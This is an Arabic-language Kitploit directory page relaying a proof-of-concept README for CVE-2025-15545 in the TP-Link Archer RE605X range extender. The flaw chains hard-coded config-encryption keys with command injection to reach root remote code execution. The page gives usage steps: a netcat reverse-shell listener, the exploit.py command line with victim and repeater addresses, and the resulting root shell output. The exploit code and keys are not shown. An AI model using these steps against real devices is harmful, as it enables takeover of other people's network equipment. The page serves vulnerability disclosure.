Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-15545 — إثبات المفهوم لـ CVE-2025-15545 | Kitploit
أدوات/GitHubGitHub/xernary/cve-2025-15545
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالالهندسة العكسيةالقيادة والسيطرة
GitHubxernary/cve-2025-15545

CVE-2025-15545

إثبات المفهوم لـ CVE-2025-15545

عرض المستودع
12منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2025-15545

معلومات

البائع: TP-Link
موقع البائع: TP-Link
الطراز: Archer RE605X
إصدار العتاد: RE605X v3.0
إصدار البرنامج الثابت: RE605X(EU)_V3_1.1.5 Build 20240905
عنوان تحميل البرنامج الثابت: TP-Link

سلسلة من الثغرات — بما في ذلك استخدام مفاتيح تشفير ثابتة وحقن أوامر في مكون محلل تكوين XML — تسمح لمهاجم محلي موثوق بتحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) كجذر (root) على الجهاز.

متطلبات الإثبات (PoC)

ملاحظة: يُظهر الإثبات exploit.py سيناريو هجوم متسلسل ويعتمد على بيانات اعتماد من مستخدم موثوق كمتطلب إضافي. لا تغطي CVE-2025-15545 خطوة المصادقة هذه وهي مدرجة لأغراض العرض التوضيحي فقط.

  • يجب أن يكون كل من المهاجم والضحية متصلين بالشبكة المحلية للمكرر.
  • يجب أن يكون الضحية موثقًا (مُصادقًا) في لوحة التحكم الإلكترونية للمكرر.

الاستخدام

استمع للاتصالات الواردة على طرفية منفصلة:

root@kitploit:~
$ nc -lvnp 4444

نفذ البرنامج النصي exploit.py:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

ملاحظة: aes_key وaes_iv هما مفتاحا التشفير الثابتان المستخدمان لتشفير وفك تشفير ملفات التهيئة بواسطة الجهاز، وهما مطلوبان لهذا الإثبات. لأسباب أمنية لا يمكن مشاركتهما هنا.

يتم استلام الصدفة العكسية على الطرفية الأولى:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

المراجع

تم الإبلاغ عن هذه الثغرات بواسطة Nicola Giuffrida.

  • المقالة الكاملة: https://nico-security.com/posts/cve-2025-15545
  • سجل CVE: https://www.cve.org/cverecord?id=CVE-2025-15545
  • تنبيه TP-Link: https://www.tp-link.com/us/support/faq/4929
تنزيل الأداة